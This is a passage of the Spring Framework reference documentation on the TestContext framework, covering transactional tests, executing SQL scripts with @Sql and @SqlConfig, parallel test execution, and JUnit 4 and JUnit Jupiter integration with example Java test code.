details.\n\n[[testcontext-tx-programmatic-tx-mgt]]\n===== Programmatic transaction management\nSince Spring Framework 4.1, it is possible to interact with test-managed transactions\n_programmatically_ via the static methods in `TestTransaction`. For example,\n`TestTransaction` may be used within _test_ methods, _before_ methods, and _after_\nmethods to start or end the current test-managed transaction or to configure the current\ntest-managed transaction for rollback or commit. Support for `TestTransaction` is\nautomatically available whenever the `TransactionalTestExecutionListener` is enabled.\n\nThe following example demonstrates some of the features of `TestTransaction`. Consult the\njavadocs for `TestTransaction` for further details.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration(classes = TestConfig.class)\n\tpublic class ProgrammaticTransactionManagementTests extends\n\t\t\tAbstractTransactionalJUnit4SpringContextTests {\n\t\n\t\t@Test\n\t\tpublic void transactionalTest() {\n\t\t\t\/\/ assert initial state in test database:\n\t\t\tassertNumUsers(2);\n\n\t\t\tdeleteFromTables(\"user\");\n\n\t\t\t\/\/ changes to the database will be committed!\n\t\t\tTestTransaction.flagForCommit();\n\t\t\tTestTransaction.end();\n\t\t\tassertFalse(TestTransaction.isActive());\n\t\t\tassertNumUsers(0);\n\n\t\t\tTestTransaction.start();\n\t\t\t\/\/ perform other actions against the database that will\n\t\t\t\/\/ be automatically rolled back after the test completes...\n\t\t}\n\n\t\tprotected void assertNumUsers(int expected) {\n\t\t\tassertEquals(\"Number of rows in the [user] table.\", expected, countRowsInTable(\"user\"));\n\t\t}\n\t}\n----\n\n[[testcontext-tx-before-and-after-tx]]\n===== Executing code outside of a transaction\n\nOccasionally you need to execute certain code before or after a transactional test method\nbut outside the transactional context -- for example, to verify the initial database state\nprior to execution of your test or to verify expected transactional commit behavior after\ntest execution (if the test was configured to commit the transaction).\n`TransactionalTestExecutionListener` supports the `@BeforeTransaction` and\n`@AfterTransaction` annotations exactly for such scenarios. Simply annotate any `void`\nmethod in a test class or any `void` default method in a test interface with one of these\nannotations, and the `TransactionalTestExecutionListener` ensures that your __before\ntransaction method__ or __after transaction method__ is executed at the appropriate time.\n\n[TIP]\n====\nAny __before methods__ (such as methods annotated with JUnit Jupiter's `@BeforeEach`) and\nany __after methods__ (such as methods annotated with JUnit Jupiter's `@AfterEach`) are\nexecuted __within__ a transaction. In addition, methods annotated with\n`@BeforeTransaction` or `@AfterTransaction` are naturally not executed for test methods\nthat are not configured to run within a transaction.\n====\n\n[[testcontext-tx-mgr-config]]\n===== Configuring a transaction manager\n\n`TransactionalTestExecutionListener` expects a `PlatformTransactionManager` bean to be\ndefined in the Spring `ApplicationContext` for the test. In case there are multiple\ninstances of `PlatformTransactionManager` within the test's `ApplicationContext`, a\n_qualifier_ may be declared via `@Transactional(\"myTxMgr\")` or\n`@Transactional(transactionManager = \"myTxMgr\")`, or `TransactionManagementConfigurer`\ncan be implemented by an `@Configuration` class. Consult the javadocs for\n`TestContextTransactionUtils.retrieveTransactionManager()` for details on the algorithm\nused to look up a transaction manager in the test's `ApplicationContext`.\n\n[[testcontext-tx-annotation-demo]]\n===== Demonstration of all transaction-related annotations\n\nThe following JUnit 4 based example displays a _fictitious_ integration testing scenario\nhighlighting all transaction-related annotations. The example is **not** intended to\ndemonstrate best practices but rather to demonstrate how these annotations can be used.\nConsult the <<integration-testing-annotations,annotation support>> section for further\ninformation and configuration examples. <<testcontext-executing-sql-declaratively-tx,\nTransaction management for `@Sql`>> contains an additional example using `@Sql` for\ndeclarative SQL script execution with default transaction rollback semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\t**@Transactional(transactionManager = \"txMgr\")**\n\t**@Commit**\n\tpublic class FictitiousTransactionalTest {\n\n\t\t**@BeforeTransaction**\n\t\tvoid verifyInitialDatabaseState() {\n\t\t\t\/\/ logic to verify the initial state before a transaction is started\n\t\t}\n\n\t\t@Before\n\t\tpublic void setUpTestDataWithinTransaction() {\n\t\t\t\/\/ set up test data within the transaction\n\t\t}\n\n\t\t@Test\n\t\t\/\/ overrides the class-level @Commit setting\n\t\t**@Rollback**\n\t\tpublic void modifyDatabaseWithinTransaction() {\n\t\t\t\/\/ logic which uses the test data and modifies database state\n\t\t}\n\n\t\t@After\n\t\tpublic void tearDownWithinTransaction() {\n\t\t\t\/\/ execute \"tear down\" logic within the transaction\n\t\t}\n\n\t\t**@AfterTransaction**\n\t\tvoid verifyFinalDatabaseState() {\n\t\t\t\/\/ logic to verify the final state after transaction has rolled back\n\t\t}\n\n\t}\n----\n\n[[testcontext-tx-false-positives]]\n.Avoid false positives when testing ORM code\n[NOTE]\n====\nWhen you test application code that manipulates the state of a Hibernate session or JPA\npersistence context, make sure to __flush__ the underlying unit of work within test\nmethods that execute that code. Failing to flush the underlying unit of work can produce\n__false positives__: your test may pass, but the same code throws an exception in a live,\nproduction environment. In the following Hibernate-based example test case, one method\ndemonstrates a false positive, and the other method correctly exposes the results of\nflushing the session. Note that this applies to any ORM frameworks that maintain an\nin-memory __unit of work__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@Autowired\n\tSessionFactory sessionFactory;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ False positive: an exception will be thrown once the Hibernate\n\t\t\/\/ Session is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithSessionFlush() {\n\t\tupdateEntityInHibernateSession();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tsessionFactory.getCurrentSession().flush();\n\t}\n\n\t\/\/ ...\n----\n\nOr for JPA:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ ...\n\n\t@PersistenceContext\n\tEntityManager entityManager;\n\n\t@Transactional\n\t@Test \/\/ no expected exception!\n\tpublic void falsePositive() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ False positive: an exception will be thrown once the JPA\n\t\t\/\/ EntityManager is finally flushed (i.e., in production code)\n\t}\n\n\t@Transactional\n\t@Test(expected = ...)\n\tpublic void updateWithEntityManagerFlush() {\n\t\tupdateEntityInJpaPersistenceContext();\n\t\t\/\/ Manual flush is required to avoid false positive in test\n\t\tentityManager.flush();\n\t}\n\n\t\/\/ ...\n----\n====\n\n\n[[testcontext-executing-sql]]\n==== Executing SQL scripts\n\nWhen writing integration tests against a relational database, it is often beneficial\nto execute SQL scripts to modify the database schema or insert test data into tables.\nThe `spring-jdbc` module provides support for _initializing_ an embedded or existing\ndatabase by executing SQL scripts when the Spring `ApplicationContext` is loaded. See\n<<data-access.adoc#jdbc-embedded-database-support, Embedded database support>> and\n<<data-access.adoc#jdbc-embedded-database-dao-testing,\nTesting data access logic with an embedded database>> for details.\n\nAlthough it is very useful to initialize a database for testing _once_ when the\n`ApplicationContext` is loaded, sometimes it is essential to be able to modify the\ndatabase _during_ integration tests. The following sections explain how to execute SQL\nscripts programmatically and declaratively during integration tests.\n\n[[testcontext-executing-sql-programmatically]]\n===== Executing SQL scripts programmatically\n\nSpring provides the following options for executing SQL scripts programmatically within\nintegration test methods.\n\n* `org.springframework.jdbc.datasource.init.ScriptUtils`\n* `org.springframework.jdbc.datasource.init.ResourceDatabasePopulator`\n* `org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests`\n* `org.springframework.test.context.testng.AbstractTransactionalTestNGSpringContextTests`\n\n`ScriptUtils` provides a collection of static utility methods for working with SQL scripts\nand is mainly intended for internal use within the framework. However, if you require\nfull control over how SQL scripts are parsed and executed, `ScriptUtils` may suit your\nneeds better than some of the other alternatives described below. Consult the javadocs for\nindividual methods in `ScriptUtils` for further details.\n\n`ResourceDatabasePopulator` provides a simple object-based API for programmatically\npopulating, initializing, or cleaning up a database using SQL scripts defined in\nexternal resources. `ResourceDatabasePopulator` provides options for configuring the\ncharacter encoding, statement separator, comment delimiters, and error handling flags\nused when parsing and executing the scripts, and each of the configuration options has\na reasonable default value. Consult the javadocs for details on default values. To\nexecute the scripts configured in a `ResourceDatabasePopulator`, you can invoke either\nthe `populate(Connection)` method to execute the populator against a\n`java.sql.Connection` or the `execute(DataSource)` method to execute the populator\nagainst a `javax.sql.DataSource`. The following example specifies SQL scripts for a test\nschema and test data, sets the statement separator to `\"@@\"`, and then executes the\nscripts against a `DataSource`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\tpublic void databaseTest {\n\t\tResourceDatabasePopulator populator = new ResourceDatabasePopulator();\n\t\tpopulator.addScripts(\n\t\t\tnew ClassPathResource(\"test-schema.sql\"), \n\t\t\tnew ClassPathResource(\"test-data.sql\"));\n\t\tpopulator.setSeparator(\"@@\");\n\t\tpopulator.execute(this.dataSource);\n\t\t\/\/ execute code that uses the test schema and data\n\t}\n----\n\nNote that `ResourceDatabasePopulator` internally delegates to `ScriptUtils` for parsing\nand executing SQL scripts. Similarly, the `executeSqlScript(..)` methods in\n<<testcontext-support-classes-junit4, `AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\ninternally use a `ResourceDatabasePopulator` for executing SQL scripts. Consult the javadocs\nfor the various `executeSqlScript(..)` methods for further details.\n\n\n[[testcontext-executing-sql-declaratively]]\n===== Executing SQL scripts declaratively with @Sql\n\nIn addition to the aforementioned mechanisms for executing SQL scripts\n_programmatically_, SQL scripts can also be configured _declaratively_ in the Spring\nTestContext Framework. Specifically, the `@Sql` annotation can be declared on a test\nclass or test method to configure the resource paths to SQL scripts that should be\nexecuted against a given database either before or after an integration test method. Note\nthat method-level declarations override class-level declarations and that support for\n`@Sql` is provided by the `SqlScriptsTestExecutionListener` which is enabled by default.\n\n*Path resource semantics*\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"schema.sql\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/schema.sql\"`. A path\nwhich references a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.)\nwill be loaded using the specified resource protocol.\n\nThe following example demonstrates how to use `@Sql` at the class level and at the method\nlevel within a JUnit Jupiter based integration test class.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@SpringJUnitConfig\n\t@Sql(\"\/test-schema.sql\")\n\tclass DatabaseTests {\n\n\t\t@Test\n\t\tvoid emptySchemaTest {\n\t\t\t\/\/ execute code that uses the test schema without any test data\n\t\t}\n\n\t\t@Test\n\t\t@Sql({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\t\tvoid userTest {\n\t\t\t\/\/ execute code that uses the test schema and test data\n\t\t}\n\t}\n----\n\n*Default script detection*\n\nIf no SQL scripts are specified, an attempt will be made to detect a `default` script\ndepending on where `@Sql` is declared. If a default cannot be detected, an\n`IllegalStateException` will be thrown.\n\n* __class-level declaration__: if the annotated test class is `com.example.MyTest`, the\n\tcorresponding default script is `\"classpath:com\/example\/MyTest.sql\"`.\n* __method-level declaration__: if the annotated test method is named `testMethod()` and is\n\tdefined in the class `com.example.MyTest`, the corresponding default script is\n\t`\"classpath:com\/example\/MyTest.testMethod.sql\"`.\n\n*Declaring multiple `@Sql` sets*\n\nIf multiple sets of SQL scripts need to be configured for a given test class or test\nmethod but with different syntax configuration, different error handling rules, or\ndifferent execution phases per set, it is possible to declare multiple instances of\n`@Sql`. With Java 8, `@Sql` can be used as a _repeatable_ annotation. Otherwise, the\n`@SqlGroup` annotation can be used as an explicit container for declaring multiple\ninstances of `@Sql`.\n\nThe following example demonstrates the use of `@Sql` as a repeatable annotation using\nJava 8. In this scenario the `test-schema.sql` script uses a different syntax for\nsingle-line comments.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\"))\n\t@Sql(\"\/test-user-data.sql\")\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\nThe following example is identical to the above except that the `@Sql` declarations are\ngrouped together within `@SqlGroup` for compatibility with Java 6 and Java 7.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@SqlGroup({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n*Script execution phases*\n\nBy default, SQL scripts will be executed _before_ the corresponding test method. However,\nif a particular set of scripts needs to be executed _after_ the test method -- for\nexample, to clean up database state -- the `executionPhase` attribute in `@Sql` can be\nused as seen in the following example. Note that `ISOLATED` and `AFTER_TEST_METHOD` are\nstatically imported from `Sql.TransactionMode` and `Sql.ExecutionPhase` respectively.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"create-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED)\n\t)\n\t@Sql(\n\t\tscripts = \"delete-test-data.sql\",\n\t\tconfig = @SqlConfig(transactionMode = ISOLATED),\n\t\texecutionPhase = AFTER_TEST_METHOD\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that needs the test data to be committed\n\t\t\/\/ to the database outside of the test's transaction\n\t}\n----\n\n*Script configuration with `@SqlConfig`*\n\nConfiguration for script parsing and error handling can be configured via the\n`@SqlConfig` annotation. When declared as a class-level annotation on an integration test\nclass, `@SqlConfig` serves as _global_ configuration for all SQL scripts within the test\nclass hierarchy. When declared directly via the `config` attribute of the `@Sql`\nannotation, `@SqlConfig` serves as _local_ configuration for the SQL scripts declared\nwithin the enclosing `@Sql` annotation. Every attribute in `@SqlConfig` has an implicit\ndefault value which is documented in the javadocs of the corresponding attribute. Due to\nthe rules defined for annotation attributes in the Java Language Specification, it is\nunfortunately not possible to assign a value of `null` to an annotation attribute. Thus,\nin order to support overrides of inherited global configuration, `@SqlConfig` attributes\nhave an explicit default value of either `\"\"` for Strings or `DEFAULT` for Enums. This\napproach allows local declarations of `@SqlConfig` to selectively override individual\nattributes from global declarations of `@SqlConfig` by providing a value other than `\"\"`\nor `DEFAULT`. Global `@SqlConfig` attributes are inherited whenever local `@SqlConfig`\nattributes do not supply an explicit value other than `\"\"` or `DEFAULT`. Explicit _local_\nconfiguration therefore overrides _global_ configuration.\n\nThe configuration options provided by `@Sql` and `@SqlConfig` are equivalent to those\nsupported by `ScriptUtils` and `ResourceDatabasePopulator` but are a superset of those\nprovided by the `<jdbc:initialize-database\/>` XML namespace element. Consult the javadocs\nof individual attributes in `@Sql` and `@SqlConfig` for details.\n\n[[testcontext-executing-sql-declaratively-tx]]\n*Transaction management for `@Sql`*\n\nBy default, the `SqlScriptsTestExecutionListener` will infer the desired transaction\nsemantics for scripts configured via `@Sql`. Specifically, SQL scripts will be executed\nwithout a transaction, within an existing Spring-managed transaction -- for example, a\ntransaction managed by the `TransactionalTestExecutionListener` for a test annotated with\n`@Transactional` -- or within an isolated transaction, depending on the configured value\nof the `transactionMode` attribute in `@SqlConfig` and the presence of a\n`PlatformTransactionManager` in the test's `ApplicationContext`. As a bare minimum\nhowever, a `javax.sql.DataSource` must be present in the test's `ApplicationContext`.\n\nIf the algorithms used by `SqlScriptsTestExecutionListener` to detect a `DataSource` and\n`PlatformTransactionManager` and infer the transaction semantics do not suit your needs,\nyou may specify explicit names via the `dataSource` and `transactionManager` attributes\nof `@SqlConfig`. Furthermore, the transaction propagation behavior can be controlled via\nthe `transactionMode` attribute of `@SqlConfig` -- for example, if scripts should be\nexecuted in an isolated transaction. Although a thorough discussion of all supported\noptions for transaction management with `@Sql` is beyond the scope of this reference\nmanual, the javadocs for `@SqlConfig` and `SqlScriptsTestExecutionListener` provide\ndetailed information, and the following example demonstrates a typical testing scenario\nusing JUnit Jupiter and transactional tests with `@Sql`. Note that there is no need to\nclean up the database after the `usersTest()` method is executed since any changes made\nto the database (either within the test method or within the `\/test-data.sql` script)\nwill be automatically rolled back by the `TransactionalTestExecutionListener` (see\n<<testcontext-tx,transaction management>> for details).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@SpringJUnitConfig(TestDatabaseConfig.class)\n\t@Transactional\n\tclass TransactionalSqlScriptsTests {\n\n\t\tfinal JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tTransactionalSqlScriptsTests(DataSource dataSource) {\n\t\t\tthis.jdbcTemplate = new JdbcTemplate(dataSource);\n\t\t}\n\n\t\t@Test\n\t\t@Sql(\"\/test-data.sql\")\n\t\tvoid usersTest() {\n\t\t\t\/\/ verify state in test database:\n\t\t\tassertNumUsers(2);\n\t\t\t\/\/ execute code that uses the test data...\n\t\t}\n\n\t\tint countRowsInTable(String tableName) {\n\t\t\treturn JdbcTestUtils.countRowsInTable(this.jdbcTemplate, tableName);\n\t\t}\n\n\t\tvoid assertNumUsers(int expected) {\n\t\t\tassertEquals(expected, countRowsInTable(\"user\"),\n\t\t\t\t\"Number of rows in the [user] table.\");\n\t\t}\n\t}\n----\n\n\n[[testcontext-parallel-test-execution]]\n==== Parallel test execution\n\nSpring Framework 5.0 introduces basic support for executing tests in parallel within a\nsingle JVM when using the _Spring TestContext Framework_. In general this means that most\ntest classes or test methods can be executed in parallel without any changes to test code\nor configuration.\n\n[TIP]\n====\nFor details on how to set up parallel test execution, consult the documentation for your\ntesting framework, build tool, or IDE.\n====\n\nKeep in mind that the introduction of concurrency into your test suite can result in\nunexpected side effects, strange runtime behavior, and tests that only fail intermittently\nor seemingly randomly. The Spring Team therefore provides the following general guidelines\nfor when __not__ to execute tests in parallel.\n\n__Do not execute tests in parallel if:__\n\n* Tests make use of Spring's `@DirtiesContext` support.\n* Tests make use of JUnit 4's `@FixMethodOrder` support or any testing framework feature\n that is designed to ensure that test methods execute in a particular order. Note,\n however, that this does not apply if entire test classes are executed in parallel.\n* Tests change the state of shared services or systems such as a database, message broker,\n filesystem, etc. This applies to both in-memory and external systems.\n\n[TIP]\n====\nIf parallel test execution fails with an exception stating that the `ApplicationContext`\nfor the current test is no longer active, this typically means that the\n`ApplicationContext` was removed from the `ContextCache` in a different thread.\n\nThis may be due to the use of `@DirtiesContext` or due to automatic eviction from the\n`ContextCache`. If `@DirtiesContext` is the culprit, you will either need to find a way\nto avoid using `@DirtiesContext` or exclude such tests from parallel execution. If the\nmaximum size of the `ContextCache` has been exceeded, you can increase the maximum size\nof the cache. See the discussion on <<testcontext-ctx-management-caching,context\ncaching>> for details.\n====\n\n[WARNING]\n====\nParallel test execution in the Spring TestContext Framework is only possible if the\nunderlying `TestContext` implementation provides a _copy constructor_ as explained in the\njavadocs for `TestContext`. The `DefaultTestContext` used in Spring provides such a\nconstructor; however, if you use a third-party library that provides a custom\n`TestContext` implementation, you will need to verify if it is suitable for parallel test\nexecution.\n====\n\n[[testcontext-support-classes]]\n==== TestContext Framework support classes\n\n\n[[testcontext-junit4-runner]]\n===== Spring JUnit 4 Runner\n\nThe __Spring TestContext Framework__ offers full integration with JUnit 4 through a\ncustom runner (supported on JUnit 4.12 or higher). By annotating test classes with\n`@RunWith(SpringJUnit4ClassRunner.class)` or the shorter `@RunWith(SpringRunner.class)`\nvariant, developers can implement standard JUnit 4 based unit and integration tests and\nsimultaneously reap the benefits of the TestContext framework such as support for loading\napplication contexts, dependency injection of test instances, transactional test method\nexecution, and so on. If you would like to use the Spring TestContext Framework with an\nalternative runner such as JUnit 4's `Parameterized` or third-party runners such as the\n`MockitoJUnitRunner`, you may optionally use <<testcontext-junit4-rules,Spring's support\nfor JUnit rules>> instead.\n\nThe following code listing displays the minimal requirements for configuring a test class\nto run with the custom Spring `Runner`. `@TestExecutionListeners` is configured with an\nempty list in order to disable the default listeners, which otherwise would require an\n`ApplicationContext` to be configured through `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@RunWith(SpringRunner.class)\n@TestExecutionListeners({})\npublic class SimpleTest {\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-junit4-rules]]\n===== Spring JUnit 4 Rules\n\nThe `org.springframework.test.context.junit4.rules` package provides the following JUnit\n4 rules (supported on JUnit 4.12 or higher).\n\n* `SpringClassRule`\n* `SpringMethodRule`\n\n`SpringClassRule` is a JUnit `TestRule` that supports _class-level_ features of the\n_Spring TestContext Framework_; whereas, `SpringMethodRule` is a JUnit `MethodRule` that\nsupports instance-level and method-level features of the _Spring TestContext Framework_.\n\nIn contrast to the `SpringRunner`, Spring's rule-based JUnit support has the advantage\nthat it is independent of any `org.junit.runner.Runner` implementation and can therefore\nbe combined with existing alternative runners like JUnit 4's `Parameterized` or third-party\nrunners such as the `MockitoJUnitRunner`.\n\nIn order to support the full functionality of the TestContext framework, a\n`SpringClassRule` must be combined with a `SpringMethodRule`. The following example\ndemonstrates the proper way to declare these rules in an integration test.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Optionally specify a non-Spring Runner via @RunWith(...)\n@ContextConfiguration\npublic class IntegrationTest {\n\n @ClassRule\n public static final SpringClassRule springClassRule = new SpringClassRule();\n\n @Rule\n public final SpringMethodRule springMethodRule = new SpringMethodRule();\n\n @Test\n public void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\n\n[[testcontext-support-classes-junit4]]\n===== JUnit 4 support classes\n\nThe `org.springframework.test.context.junit4` package provides the following support\nclasses for JUnit 4 based test cases (supported on JUnit 4.12 or higher).\n\n* `AbstractJUnit4SpringContextTests`\n* `AbstractTransactionalJUnit4SpringContextTests`\n\n`AbstractJUnit4SpringContextTests` is an abstract base test class that integrates the\n__Spring TestContext Framework__ with explicit `ApplicationContext` testing support in\na JUnit 4 environment. When you extend `AbstractJUnit4SpringContextTests`, you can\naccess a `protected` `applicationContext` instance variable that can be used to perform\nexplicit bean lookups or to test the state of the context as a whole.\n\n`AbstractTransactionalJUnit4SpringContextTests` is an abstract __transactional__ extension\nof `AbstractJUnit4SpringContextTests` that adds some convenience functionality for JDBC\naccess. This class expects a `javax.sql.DataSource` bean and a `PlatformTransactionManager`\nbean to be defined in the `ApplicationContext`. When you extend\n`AbstractTransactionalJUnit4SpringContextTests` you can access a `protected` `jdbcTemplate`\ninstance variable that can be used to execute SQL statements to query the database. Such\nqueries can be used to confirm database state both __prior to__ and __after__ execution of\ndatabase-related application code, and Spring ensures that such queries run in the scope of\nthe same transaction as the application code. When used in conjunction with an ORM tool,\nbe sure to avoid <<testcontext-tx-false-positives,false positives>>. As mentioned in\n<<integration-testing-support-jdbc>>, `AbstractTransactionalJUnit4SpringContextTests`\nalso provides convenience methods which delegate to methods in `JdbcTestUtils` using the\naforementioned `jdbcTemplate`. Furthermore, `AbstractTransactionalJUnit4SpringContextTests`\nprovides an `executeSqlScript(..)` method for executing SQL scripts against the configured\n`DataSource`.\n\n[TIP]\n====\nThese classes are a convenience for extension. If you do not want your test classes to be\ntied to a Spring-specific class hierarchy, you can configure your own custom test classes\nby using `@RunWith(SpringRunner.class)` or <<testcontext-junit4-rules,Spring's\nJUnit rules>>.\n====\n\n\n[[testcontext-junit-jupiter-extension]]\n===== SpringExtension for JUnit Jupiter\n\nThe __Spring TestContext Framework__ offers full integration with the _JUnit Jupiter_\ntesting framework introduced in JUnit 5. By annotating test classes with\n`@ExtendWith(SpringExtension.class)`, developers can implement standard JUnit Jupiter\nbased unit and integration tests and simultaneously reap the benefits of the TestContext\nframework such as support for loading application contexts, dependency injection of test\ninstances, transactional test method execution, and so on.\n\nFurthermore, thanks to the rich extension API in JUnit Jupiter, Spring is able to provide\nthe following features above and beyond the feature set that Spring supports for JUnit 4\nand TestNG.\n\n* Dependency injection for test constructors, test methods, and test lifecycle callback\n methods\n - See <<testcontext-junit-jupiter-di>> for further details.\n* Powerful support for link:http:\/\/junit.org\/junit5\/docs\/current\/user-guide\/#extensions-conditions[_conditional test execution_]\n based on SpEL expressions, environment variables, system properties, etc.\n - See the documentation for `@EnabledIf` and `@DisabledIf` in\n <<integration-testing-annotations-junit-jupiter>> for further details and examples.\n* Custom _composed annotations_ that combine annotations from Spring **and** JUnit\n Jupiter.\n - See the `@TransactionalDevTestConfig` and `@TransactionalIntegrationTest` examples in\n <<integration-testing-annotations-meta>> for further details.\n\nThe following code listing demonstrates how to configure a test class to use the\n`SpringExtension` in conjunction with `@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs JUnit Jupiter to extend the test with Spring support.\n@ExtendWith(SpringExtension.class)\n\/\/ Instructs Spring to load an ApplicationContext from TestConfig.class\n@ContextConfiguration(classes = TestConfig.class)\nclass SimpleTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSince annotations in JUnit 5 can also be used as meta-annotations, Spring is able to\nprovide `@SpringJUnitConfig` and `@SpringJUnitWebConfig` __composed annotations__ to\nsimplify the configuration of the test `ApplicationContext` and JUnit Jupiter.\n\nFor example, the following example uses `@SpringJUnitConfig` to reduce the amount of\nconfiguration used in the previous example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs Spring to register the SpringExtension with JUnit\n\/\/ Jupiter and load an ApplicationContext from TestConfig.class\n@SpringJUnitConfig(TestConfig.class)\nclass SimpleTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSimilarly, the following example uses `@SpringJUnitWebConfig` to create a\n`WebApplicationContext` for use with JUnit Jupiter.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\/\/ Instructs Spring to register the SpringExtension with JUnit\n\/\/ Jupiter and load a WebApplicationContext from TestWebConfig.class\n@SpringJUnitWebConfig(TestWebConfig.class)\nclass SimpleWebTests {\n\n @Test\n void testMethod() {\n \/\/ execute test logic...\n }\n}\n----\n\nSee the documentation for `@SpringJUnitConfig` and `@SpringJUnitWebConfig` in\n<<integration-testing-annotations-junit-jupiter>> for further details.\n\n\n[[testcontext-junit-jupiter-di]]\n===== Dependency Injection with the SpringExtension\n\nThe `SpringExtension` implements the\nlink:http:\/\/junit.org\/junit5\/docs\/current\/user-guide\/#extensions-parameter-resolution[`ParameterResolver`]\nextension API from JUnit Jupiter which allows Spring to provide dependency injection for\ntest constructors, test methods, and test lifecycle callback methods.\n\nSpecifically, the `SpringExtension` is able to inject dependencies from the test's\n`ApplicationContext` into test constructors and methods annotated with `@BeforeAll`,\n`@AfterAll`, `@BeforeEach`, `@AfterEach`, `@Test`, `@RepeatedTest`, `@ParameterizedTest`,\netc.\n\n[[testcontext-junit-jupiter-di-constructor]]\n====== Constructor Injection\n\nIf a parameter in a constructor for a JUnit Jupiter test class is of type\n`ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with\n`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific\nparameter with the corresponding bean from the test's `ApplicationContext`. A test\nconstructor can also be directly annotated with `@Autowired` if all of the parameters\nshould be supplied by Spring.\n\n[WARNING]\n====\nIf the constructor for a test class is itself annotated with `@Autowired`, Spring will\nassume the responsibility for resolving **all** parameters in the constructor.\nConsequently, no other `ParameterResolver` registered with JUnit Jupiter will be able to\nresolve parameters for such a constructor.\n====\n\nIn the following example, Spring will inject the `OrderService` bean from the\n`ApplicationContext` loaded from `TestConfig.class` into the\n`OrderServiceIntegrationTests` constructor. Note as well that this feature allows test\ndependencies to be `final` and therefore _immutable_.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n private final OrderService orderService;\n\n @Autowired\n OrderServiceIntegrationTests(OrderService orderService) {\n this.orderService = orderService.\n }\n\n \/\/ tests that use the injected OrderService\n}\n----\n\n[[testcontext-junit-jupiter-di-method]]\n====== Method Injection\n\nIf a parameter in a JUnit Jupiter test method or test lifecycle callback method is of\ntype `ApplicationContext` (or a sub-type thereof) or is annotated or meta-annotated with\n`@Autowired`, `@Qualifier`, or `@Value`, Spring will inject the value for that specific\nparameter with the corresponding bean from the test's `ApplicationContext`.\n\nIn the following example, Spring will inject the `OrderService` from the\n`ApplicationContext` loaded from `TestConfig.class` into the `deleteOrder()` test method.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n @Test\n void deleteOrder(@Autowired OrderService orderService) {\n \/\/ use orderService from the test's ApplicationContext\n }\n}\n----\n\nDue to the robustness of the `ParameterResolver` support in JUnit Jupiter, it is also\npossible to have multiple dependencies injected into a single method not only from Spring\nbut also from JUnit Jupiter itself or other third-party extensions.\n\nThe following example demonstrates how to have both Spring and JUnit Jupiter inject\ndependencies into the `placeOrderRepeatedly()` test method simultaneously. Note that the\nuse of `@RepeatedTest` from JUnit Jupiter allows the test method to gain access to the\n`RepetitionInfo`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@SpringJUnitConfig(TestConfig.class)\nclass OrderServiceIntegrationTests {\n\n @RepeatedTest(10)\n void placeOrderRepeatedly(RepetitionInfo repetitionInfo,\n @Autowired OrderService orderService) {\n\n \/\/ use orderService from the test's ApplicationContext\n \/\/ and repetitionInfo from JUnit Jupiter\n }\n}\n----\n\n\n[[testcontext-support-classes-testng]]\n===== TestNG support classes\n\nThe `org.springframework.test.context.testng` package provides the following 